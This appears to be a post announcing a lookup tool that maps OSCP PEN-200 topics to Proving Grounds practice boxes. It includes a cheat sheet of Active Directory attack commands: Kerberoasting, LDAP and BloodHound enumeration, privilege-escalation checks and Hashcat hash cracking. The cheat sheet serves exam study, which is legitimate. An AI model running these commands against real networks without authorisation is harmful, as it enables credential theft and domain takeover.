Listen to this Post
Exciting news for aspiring OSCP candidates and pentesting enthusiasts! A new web-based lookup tool has been launched to help match PEN-200 attack topics and study objectives with corresponding Proving Grounds (PG) practice boxes. This tool eliminates the hassle of manually searching through spreadsheets or markdown files, streamlining your preparation process.
🔗 Try it here: https://lnkd.in/gC7jjjVY
Current Features:
✔ 4 PG boxes integrated into the search engine
✔ Searchable tags including:
– `kerberoasting`
– `ldap`
– `lfi`
– `windowsPrivilegeEscalation`
– `MSSQL`
– `passwordCracking`
– `bloodhound`
– `smb`
– `ntds`
– `lateralMove`
– `activeDirectoryEnumeration`
– `tunneling`
– `silverTicket`
You Should Know:
1. Kerberoasting Attack (Windows)
Extract SPN accounts GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> Crack hashes with Hashcat hashcat -m 13100 hashes.txt rockyou.txt
2. LDAP Enumeration
Using ldapsearch ldapsearch -x -h <DC_IP> -D "<USER>@<DOMAIN>" -w <PASSWORD> -b "dc=<DOMAIN>,dc=com" Using windapsearch python3 windapsearch.py --dc-ip <DC_IP> -u <USER> -p <PASSWORD> --da
3. Windows Privilege Escalation
Check for unquoted service paths wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows" Check for AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
4. Bloodhound & Active Directory Enumeration
Ingest data into Bloodhound
bloodhound-python -d <DOMAIN> -u <USER> -p <PASSWORD> -c All -ns <DC_IP>
Neo4j query for shortest path to Domain Admin
MATCH (u:User {name: "[email protected]"}), (g:Group {name: "DOMAIN [email protected]"}), p = shortestPath((u)-[1..]->(g)) RETURN p
5. Password Cracking with Hashcat
Crack NTLM hashes hashcat -m 1000 ntlm_hashes.txt rockyou.txt Crack Kerberos TGS tickets (KRB5TGS) hashcat -m 13100 kerberoasting_hashes.txt /usr/share/wordlists/rockyou.txt
What Undercode Say:
This tool is a game-changer for OSCP aspirants, reducing time wasted on manual searches. The integration of Proving Grounds machines with PEN-200 topics ensures structured learning. Future updates, like custom DNS support, will further enhance usability.
For hands-on practice, always verify techniques in isolated labs before real engagements.
Expected Output:
A structured lookup system that accelerates OSCP preparation by mapping attack techniques to relevant practice machines. Keep an eye on updates for new tags and boxes!
🔗 Access the tool: https://lnkd.in/gC7jjjVY
References:
Reported By: Activity 7320536893165600770 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
